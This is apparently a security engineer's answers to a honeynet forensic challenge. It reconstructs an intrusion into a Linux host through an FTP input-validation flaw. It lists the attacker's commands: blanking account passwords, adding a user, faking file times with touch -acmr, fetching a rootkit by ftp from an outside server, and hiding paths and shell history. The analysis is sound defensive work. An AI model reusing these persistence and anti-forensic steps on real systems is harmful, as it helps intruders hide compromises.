> Which vulnerability did the intruder exploit? 
	http://www.cert.org/advisories/CA-2000-13.html 
	Two Input Validation Problems in FTPD

> What ways, and in what order, did the intruder use to connect and run
commands on the system? 
	1. telnet - 09/16-18:52:51.989869 217.156.93.166:61200 ->
192.168.1.102:23
		failed login attempts for nobody and uucp
	2. tcp 24 - 09/16-18:54:02.316596 217.156.93.166:61202 ->
192.168.1.102:24
		backdoor check for noncompliant SSH
	3. tcp 6666 - 09/16-18:54:14.859871 217.156.93.166:61203 ->
192.168.1.102:6666
		backdoor check
	4. ftp - 09/16-18:55:45.198773 207.35.251.172:2243 ->
192.168.1.102:21
		hack system through ftp exploit
			id
			w
			dir
			[much meandering around /usr/local blahh blahh
]
			passwd -d nobody
			mkdir /etc/X11/applnk/Internet/.etc 
			mkdir /etc/X11/applnk/Internet/.etcpasswd
			addusr dns
			passwd dns -d
			touch -acmr /etc/X11/applnk/Internet/.etc
/etc/passwd
			touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc
			[much checking with ls with various command line
options]
	5. telnet - 09/16-19:13:27.206847 217.156.93.166:61209 ->
192.168.1.102:23
		connect back in as nobody
			w
			su dns
			cd /tmp
			mc -s (not found)
			ftp teleport.go.ro
			cd /dev/rd
			mkdir /dev/sdc0
			ftp teleport.go.ro
			grab rootkit Zer0.tar.gz
			extract rootkit
			Go (execute rootkits setup script)
	6. tcp 24 - 09/16-19:51:58.559708 217.156.93.166:61223 ->
192.168.1.102:24
			connects...does what...dont know
	7. tcp 24 - 09/16-19:59:48.228693 217.156.93.166:61226 ->
192.168.1.102:24
	8. telnet - 09/16-19:59:57.150510 217.156.93.166:61227 ->
192.168.1.102:23
	9. tcp 24 - 09/16-20:07:17.066994 217.156.93.166:61230 ->
192.168.1.102:24
	10. 

> How did the intruder try to hide his edits from the MAC times? 
	touch -acmr
	as well as the rootkit which performs various log file clean up and
file
	time cleanup

> The intruder downloaded rootkits, what were they called? Are they
new/custom 
> rootkits? 
	t0rnkit / Adore / SSH
	"Modificat de mine... Viruzzel"  he has modified the scripts to add 
	additional automation of installations

> Recover (tell how you did it too) the rootkits from the snort binary
capture
	extract out the binary contents of the transfer (the hex code).
pack the 
	code using perl or some other programming language. then gunzip and
untar.
	however, its would be easier to simply pull it from the same
location the
	hacker did (if you have no scruples).  by verifying the directory
listing
	you can be fairly sure that you are looking at the same package.

> What does the rootkit do to hide the presence of the attacker on the
system?
     *Specific filesystem mods:
	touch -acmr /etc/default /etc/pam.d
	touch -acmr /etc/default /etc/pam.d/*
	rm -f vrssnk
	rm -f /usr/info/.t0rn/shsml
	rm -rf Zer0
	cd /usr/X11R6/bin/.,/copy/adr/
	rm -rf *tgz
	rm -rf *.c *.h Makefile* cnfad CVS
	rm -rf /bin/.bash_history
	ln -s /dev/null /bin/.bash_history
	touch -acmr /tmp/.dir1 /bin
	touch -acmr /tmp/.dir2 /usr/X11R6/bin
	touch -acmr /tmp/.dir3 /etc/rc.d/rc3.d
	touch -acmr /root /etc
	rm -rf /tmp/.dir*

     *Specific to processes that run it uses Adores ava program to hide
them.
	Go(183): ./ava h /usr/X11R6/bin/.,
	Go(184): ./ava h /usr/info/.t0rn
	Go(185): ./ava h /dev/rd/sdc0
	Go(186): ./ava h /dev/rd/nscd.init
	Go(187): ./ava h /etc/rc.d/rc3.d/S50inet
	Go(188): ./ava h /usr/X11R6/lib/X11/.~
	Go(199): ./ava h /usr/X11R6/bin/.,
	Go(200): ./ava h /usr/info/.t0rn
	Go(201): ./ava h /dev/rd/sdc0
	Go(202): ./ava h /dev/rd/nscd.init
	Go(203): ./ava h /etc/rc.d/rc3.d/S50inet
	Go(204): ./ava h /usr/X11R6/lib/X11/.~

> What did you learn from this exercise?
	hmmmm...how important it is to maintain proper security rev levels
	of software?

> How long did this challenge take you? 
	2 hours

Although an email and other action are appropriate toward the attacker, I
would
send an email to teleport.go.ro whos server is still open to the username
and
password that are now available in your logs.

I'm not sure that either the Canadian School Project or ns.desteptarea.ro
are 
anything more than hosts the hacker bounced through.  An email informing
them
of the inappropriate use of their systems certainly is called for.

And email could be formally sent to to hatcheryhatched@hotmail.com (making 
the assumption that that is the hackers email addy).  Certainly nothing that

I would write would provide the proper legal babbeling that is necessary 
prior to taking whatever other action are necessary.

later...
jason...
----------------------------------------------------------------------------
---
Jason Prost
Network Security Engineer
1.630.795.4248 phone
1.877.434.6146 cell
jprost@telenisus.com